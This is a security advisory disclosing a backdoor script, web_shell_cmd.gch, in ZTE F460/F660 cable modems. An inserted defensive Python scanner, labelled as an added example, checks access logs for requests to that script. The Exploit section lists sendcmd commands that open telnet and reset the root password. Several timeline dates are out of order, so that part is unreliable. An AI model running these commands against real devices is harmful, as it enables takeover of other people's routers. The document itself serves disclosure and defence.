Last updated at Fri, 10 May 2019 17:17:23 GMT

Per Rapid7's disclosure policy at http://www.rapid7.com/disclosure.jsp, we are disclosing a discovered vulnerability regarding SOHO routers from hardware manufacturer ZTE. We have had no response from the vendor to our queries for a suitable security contact and PGP key.

One unusual aspect of this vulnerability is that its discovery does not appear to be unique, given the URLs cited below. As always, our goal with this disclosure is to strengthen the security of the Internet as a whole.

If you know a good security contact at ZTE, please let us know at security@rapid7.com so that we may get confirmation from the vendor the next time we have something security-related to discuss with their products.

Details

Many ZTE F460/F660 cable modems, preferred by ChinaTelecom and other China-based ISPs, ship with an unauthenticated backdoor. The existence of this backdoor is apparently already known in some circles. For example, see the tutorial, here:

http://www.myxzy.com/post-411.html

...which discusses how to remove web_shell_cmd.gch, since, in the tutorial's words, "any computer on the LAN can use this file to get the superuser password."

Several thousand of these devices are exposed to the Internet, according to a cursory search of the SHODAN Computer Search Engine:

http://www.shodanhq.com/search?q="Mini web server 1.0 ZTE" port:80 after%3A01-12-2013

Many of these devices also expose the web_shell_cmd.gch script, making it available to unauthenticated users from the WAN side of the cable modem. These cases appear to be a configuration error on the part of either the users or the users' ISPs.
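The distinction drawn above, between the script being reachable from the LAN and being served to unauthenticated clients on the WAN side, is something a defender can check for in web access logs. The following is an added example and not part of Rapid7's advisory or any ZTE firmware: it parses common-log-format lines (a constructed stand-in, since the modem's own log format is not documented on this page) for requests to web_shell_cmd.gch and rates each hit by whether the source address falls in RFC 1918 space (assumed here to be the LAN side) and whether the device answered with a 2xx status. The sample lines, the LAN-range assumption and the severity labels are all constructed for the example.

```python
import ipaddress
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines in common log format; not real device logs.
# 192.168.1.23 is a LAN client; 203.0.113.7 and 198.51.100.9 stand in for Internet hosts.
SAMPLE_LOG = """\
192.168.1.23 - - [23/Dec/2013:10:01:02 +0000] "GET /index.gch HTTP/1.1" 200 512
192.168.1.23 - - [23/Dec/2013:10:01:09 +0000] "POST /web_shell_cmd.gch HTTP/1.1" 200 1024
203.0.113.7 - - [23/Dec/2013:10:05:44 +0000] "GET /web_shell_cmd.gch HTTP/1.1" 200 1024
203.0.113.7 - - [23/Dec/2013:10:05:50 +0000] "POST /web_shell_cmd.gch?x=1 HTTP/1.1" 200 2048
198.51.100.9 - - [23/Dec/2013:10:07:00 +0000] "GET /login.gch HTTP/1.1" 401 128
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The script named in the advisory.
BACKDOOR_PATH = "/web_shell_cmd.gch"

# Assumption: the modem's LAN side uses RFC 1918 space. ipaddress.is_private is
# deliberately not used, because it also treats documentation ranges such as
# 203.0.113.0/24 as private, which would hide the WAN-side hits in the sample.
LAN_NETWORKS = [
    ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]


def is_lan_address(ip: str) -> bool:
    """True if the source address lies in one of the assumed LAN ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LAN_NETWORKS)


def classify_line(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for a request to the backdoor script, or None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Ignore any query string when comparing the path.
    path = m.group("path").split("?", 1)[0]
    if path.lower() != BACKDOOR_PATH:
        return None
    src = m.group("ip")
    side = "LAN" if is_lan_address(src) else "WAN"
    served = m.group("status").startswith("2")
    if side == "WAN" and served:
        severity = "critical"  # script reachable from the Internet and answering
    elif side == "WAN":
        severity = "high"      # probed from the Internet, but not served
    else:
        severity = "medium"    # LAN use: still an unauthenticated shell on the device
    return {
        "ts": m.group("ts"),
        "src": src,
        "side": side,
        "method": m.group("method"),
        "status": m.group("status"),
        "severity": severity,
    }


def scan_log(text: str) -> List[Dict[str, str]]:
    """Collect findings for every line that requested the backdoor script."""
    return [h for h in (classify_line(l) for l in text.splitlines()) if h]


def summarize(hits: List[Dict[str, str]]) -> Dict[str, object]:
    """Roll findings up into the figures an operator would act on."""
    return {
        "wan_sources": sorted({h["src"] for h in hits if h["side"] == "WAN"}),
        "lan_sources": sorted({h["src"] for h in hits if h["side"] == "LAN"}),
        "critical": sum(1 for h in hits if h["severity"] == "critical"),
    }


if __name__ == "__main__":
    findings = scan_log(SAMPLE_LOG)
    for f in findings:
        print(f"{f['severity']:8} {f['side']} {f['src']:15} {f['method']} {f['status']} {f['ts']}")
    print(summarize(findings))
```

Any "critical" finding means the script was both exposed past the LAN boundary and answering, which is the misconfiguration the advisory attributes to users or their ISPs; the LAN-only hits still show the unauthenticated script being used and are worth reviewing, since the page notes that any LAN host can use it.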

Mitigation

Users can log in to the device and remove the script completely. This may impact functionality expected by the user, however, including the ability of the upstream ISP to perform routine maintenance on the device.

Exploit

Exercising the backdoor to open a listening telnet service and change the root user's password is trivial, as shown below:

sendcmd 1 DB p TelnetCfg
sendcmd 1 DB set TelnetCfg 0 TS_UName root
sendcmd 1 DB set TelnetCfg 0 TS_UPwd password1
sendcmd 1 DB set TelnetCfg 0 TS_Port "23"

A Metasploit module exercising the backdoor's functionality will be published as soon as a suitable test device is located for in-house testing, or when a Metasploit module is contributed from the open source security community.

Credit

Rapid7 would like to thank Offensive Security for their assistance with this vulnerability disclosure.

Disclosure Timeline

2013-12-23 (Mon): Vulnerability reported by Unknown

2013-12-23 (Mon): Vulnerability confirmed by Rapid7

2013-12-23 (Mon): Disclosure contact sought at devicesupport@zteusa.com

2013-01-07 (Tue): Disclosed to CERT/CC

2013-03-03 (Mon): Public Disclosure